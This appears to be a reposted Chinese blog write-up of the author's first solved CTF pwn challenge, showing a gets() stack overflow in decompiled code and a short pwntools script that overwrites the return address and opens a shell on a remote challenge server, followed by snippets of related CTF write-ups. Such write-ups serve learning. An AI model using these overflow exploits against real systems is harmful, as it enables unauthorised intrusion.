第一解出的pwn题

最新推荐文章于 2023-07-03 21:43:59 发布
最新推荐文章于 2023-07-03 21:43:59 发布
阅读量211 收藏 1
点赞数
原文链接:http://www.cnblogs.com/liyuechan/p/9862811.html
版权

虽然题目不难,但是 是我第一次做出的pwn题,得写下。

__int64 sub_4007E6()
{
  char s1; // [sp+0h] [bp-30h]@1

  memset(&s1, 0, 0x30uLL);
  puts("Input your Name:");
  gets(&s1);
  if ( strcmp(&s1, "root") )
    ::s1 = strdup(&s1);
  return 0LL;
}

这里有溢出点。s1。

然后就很明确了。就差溢出的地址和覆盖多少了。

然后看了好久,看不出来。果断就调试,然后就直接出来了。

剩下就直接上代码了,过程有点想哭。。。还好有师傅给指点了下。

将p.sendline("whoami")
改成了p.interactive()
from pwn import *
re_add=0x0000000000400896
for i in range(10000):
    #p=process("./whoami")
    p=remote("101.71.29.5",10013)
    payload='A'*56+p64(re_add)
    p.recvuntil(">")
    p.sendline("1")
    p.recvuntil("Input your Name:\n")
    p.sendline(payload)
    p.interactive()
    p.close()

起初想爆破的。但没成功。。。所以就。。。

代码有点难看。。下次练下 写好点

转载于:https://www.cnblogs.com/liyuechan/p/9862811.html

weixin_30485799
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
攻防世界PWN之EasyPwn
seaaseesa的博客
11-15 3494
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
pwn(7.3)
m0_72827793的博客
07-03 209
解释,通过汇编语言我们知道调用函数使用call命名,call执行时,会将此时eip的值用push ebp或者rbp进行入栈,最后ret命令做一个返回,会返回到之前主程序运行的地方,那么栈的溢出,就是通过栈溢出后将函数返回的地址改成我们想要的函数。计算机中存在有符号和无符号数的存在,当一个数本来是无符号数而被传如有符号数,计算机会将符号也看成数,从而当成地址例如-1 会被识别为无符号的数据 所以-作为标识符会被认为是数据1 0001。最后读的是无符号数,那如果我们,发送负数过去,造成整数溢出。
pwn-这里等学完堆再来记详细笔记
csdn546229768的博客
11-19 213
就简单的记录下吧。 也不是很难,就是几个点,反之现在每做个都能get到新知识 嗯 目我简单的分析了下大概就是5个选项,我记得每次这种就是靠你逻辑,每个选项都是有用的,代码量少的目不会有无用代码 每个选项就如puts函数提示所说有着对应的功能,这里说下每个函数注意的点 Select1 : 对ptr进行了赋值为time_format,并占用了buf内存 Select2 : 对dword进行了赋值为time Select3 :对value赋值为time_zone,但是之前在select1中也是调
GDB调试堆漏洞之house of spirit
合天网安学院
06-25 412
原创稿件征集邮箱:[email protected]:3200599554黑客与极客相关,互联网安全领域里的热点话漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1317
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
PWN的逆向分析策略.docx
01-10
PWN的逆向分析策略.docx
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn的五道基础
lllwky的博客
03-27 6289
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
PWN】2019-ciscn your——pwn
Joaus的博客
05-05 858
的漏洞点就在数组下标越界,造成栈上任意地址读写。 在做的时候遇到的坑点: 1.在于数组类型转换输出会造成误导: 2.对不给libc.so的可以用libcsearch和onegadget配合得到onegadget地址,因为我直接调用system函数会出现段错误,应该是在对栈上数据进行操作覆盖了环境变量???但是用onegadget就成功getshelll。 from LibcSearcher...
ISCC2017 pwn 200 —— 字符串格式化漏洞
giantbranch的专栏
05-31 3591
简介  这是一道字符串格式化漏洞的目,给了libc,直接字符串格式化漏洞泄露出地址,就可以算出system的地址,最后再写got表就行了伪代码int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+14h] [bp-6Ch]@3 int v4; // [sp+1
国赛your_pwn,PIE保护
playmaker的博客
05-13 1847
目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
啥也不会还想学PWN
weixin_67749304的博客
04-26 2754
本人真小白,真的0基础。 PWN 是CTF比赛中比较难的部分。首先要做的就是把基础知识打牢。 预备知识:C语言,汇编语言,Linux基础等。 栈,是一段特殊存取的内存。它好比一个盒子,数据好比一本本的书。先放进的书会被放在盒子的最底部,后放进的书会被放在盒子的最上面。这是栈的LIFO原则。 栈溢出。在存放数据的过程中,如果不注意检测数据的顶端是否超过栈的顶端,容易产生栈溢出。 一些汇编语言的常用指令:move A ,B 表示把寄存器B中的内容放到A当中;ret 返回主程序;call 调用一个子程序
ISCC之pwn1格式化字符串漏洞详解!
BadRer的博客
05-29 3426
作为小白的我,自从入了ctf的坑就再也没爬起来过,从无到有实在是很辛苦。仅以此片纪念我的青春。   直接进入正。这是个很明显的32位的格式化字符串漏洞。 上手就先leak出libc地址,求偏移得到system地址,(我也忘了有没有给lib库,反正我是在本地调试,拿自己的lib库。Ps:在本地可以通过./libc.so.6或者ldd --version 查看libc的版本号,作为新手还是
攻防世界-whoami-栈迁移-ROP
aptx4869_li的博客
12-25 944
攻防世界-whoami-栈迁移-ROP
linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客
weixin_39611389的博客
05-16 852
摘要本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介。0x01 前言经过前面的几篇文章我们大概以及了解了基本的栈溢出漏洞的利用方式,那今天就来个进阶版。有时候我们在打CTF的时候需要的是获取系统shell,然后通过shell去拿到flag,那么我们该怎么通过溢出漏洞来拿到服务器...
pwnnum11-----覆盖栈上数据修改程序执行流程
tbsqigongzi的博客
04-22 616
攻防世界pwn进阶区 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 未开启canary保护---存在栈溢出 开启NX保护----堆栈不可执行 开启PIE----内存地址随机化 动态链接 ida一下 查看主函数 memset(buf, 0, 0x30uLL);意思是建立0x30大小的buf区,并用0填充 *(_QWORD *)seed = time(0LL);使每次程序运行产生的随机数种子都不同 查看sub_A2
ctf 简单pwn资源
最新发布
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统控制权。 CTF 简单 PWN 目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 目,从初学者到专业选手都能找到适合自己水平的目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值